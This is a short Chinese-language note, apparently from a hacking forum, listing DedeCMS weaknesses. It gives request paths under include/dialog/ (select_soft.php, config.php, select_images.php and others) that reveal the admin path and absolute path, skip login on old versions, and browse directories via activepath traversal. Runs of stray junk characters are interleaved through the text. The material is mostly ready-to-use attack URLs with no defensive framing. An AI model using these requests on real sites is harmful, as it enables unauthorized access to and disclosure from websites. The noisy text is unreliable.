1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理) A+ @* K) | u, n, w* b, F
% f0 M2 [. M/ u: } M" a5 n员帐号,新版本的就直接转向了后台.
) Y, g' H+ `( l" ]2 c, ? k; {" ~* ^% ^% b' O
2.include/dialog/config.php会爆出后台管理路径) n x" P, a/ \
3 K% q2 k" V2 x( X4 ~3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
: _9 o9 S p4 t8 d
; I. _& H# i" G1 _& Y) a$ F- E4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.: C1 j5 [# S9 J, G
, w; ^% P# M& _+ K5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
2 J3 }. }* [8 }; |' r1 |1 ?! e: d
到根目录去.不过这些版本的访问地址有些不同.
6 U4 _; G ^( p- Z- H* ?* c1 H地址为require/dialog/select_soft.php?activepath=/././././././././
! }* A1 l$ G* @, X+ Y3 i5 C; b% l* m" O3 ]5 v& @
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..8 n8 d$ j# d6 U0 t4 b
存在相同问题的文件还有9 R7 E8 V' p2 S" T3 ?" e5 b
include\dialog\select_images.php$ y% B" _. d9 r% O5 B
include\dialog\select_media.php& Z+ W6 p" `$ p w2 b9 X/ x; x
include\dialog\select_templets.php
; y. D) x: b! [' S; q n |